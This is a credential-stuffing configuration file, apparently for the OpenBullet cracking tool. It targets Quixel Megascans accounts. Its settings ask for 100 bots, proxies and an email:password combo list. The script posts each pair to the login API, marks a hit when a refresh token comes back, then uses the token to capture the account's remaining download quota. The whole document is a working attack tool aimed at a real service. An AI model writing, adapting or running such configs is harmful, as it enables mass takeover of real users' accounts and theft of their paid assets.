[SETTINGS]
{
  "Name": "Quixel",
  "SuggestedBots": 100,
  "LastModified": "2018-05-14T20:04:23.2383076+00:00",
  "AdditionalInfo": "Awesome HQ textures for game developers or 3D artists in general",
  "Author": "Ruri",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST POST "https://accounts.quixel.se/api/v1/login" AutoRedirect=TRUE 
  CONTENT "email=<USER>&password=<PASS>&realm=megascans" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "refreshToken" 
  KEYCHAIN Failure OR 
    KEY "{\"realm\":\"megascans\"}" 
    KEY "Account not found" 
    KEY "<RESPONSECODE>" Contains "401" 
    KEY "length must be at least 3 characters long" 
PARSE "<SOURCE>" JSON "token" Recursive=FALSE -> VAR "TOKEN" "" "" 
REQUEST GET "https://megascans.se/v1/users/self" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Authorization: Bearer <TOKEN>" 
PARSE "<SOURCE>" LR "currentQuota\":" "," Recursive=FALSE -> CAP "Quota" "" "" 
